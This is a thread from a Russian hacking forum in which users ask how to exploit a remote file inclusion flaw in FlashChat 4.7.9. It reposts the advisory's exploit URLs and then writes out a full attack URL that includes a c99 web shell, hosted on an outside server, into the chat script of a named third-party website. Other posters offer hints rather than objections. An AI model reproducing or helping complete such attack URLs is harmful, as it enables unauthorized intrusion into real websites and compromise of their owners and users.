Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Есть уязвимость в FlashChat v 4.7.9. Как использовать? (https://forum.antichat.xyz/showthread.php?t=51031)

Nefix 12.10.2007 10:24

Есть уязвимость в FlashChat v 4.7.9. Как использовать?
 
Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)

.Slip 12.10.2007 12:19

Цитата:

Сообщение от Nefix
Script : FlashChat v4.7.9
Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html
--------------------------
B.Files :
connection.php >Require_once($f_cms);
common.php > Require_once($f_cms);
--------------------------
Exploits :
http://www.example.com/chat/incclasses/connection.php?f_cms=[Shell-Attack]
http://www.example.com/chat/inc/common.php?f_cms=[Shell-Attack]
-------------------------

Как я понимаю вместо [Shell-Attack] нужно вставить ссылку на шелл и он должен загрузиться на сайт с установленным чатом, но ничего не получается((( объясните плиз что я неправильно делаю... и как этой уязвимостью пользоваться :)

Лучше скинь ссылку, я не могу понять что у тебя не получается. А то ты просто переписал багтрак.

Nefix 12.10.2007 16:48

ну допустим чат здесь: http://www.pesleague.com/forum/chat/flashchat.php
шелл здесь: http://burny.fromru.com/c99madshell.php

итоге получается http://www.pesleague.com/forum/chat/incclasses/connection.php?f_cms=http://burny.fromru.com/c99madshell.php
и как я понял получившаяся ссылка должна запустить шелл на pc-center.com.ua... но ничего не получается :(
или я все неправильно делаю и не так понял?

Nefix 15.10.2007 11:33

:(

Rebz 15.10.2007 11:57

Nefix,
а ты зайди по адресу h__p://www.pesleague.com/forum/chat/incclasses/connection.php и сам думаю догадаешься..

Nightmarе 15.10.2007 15:25

действительно объясните как юзать баги


Время: 22:14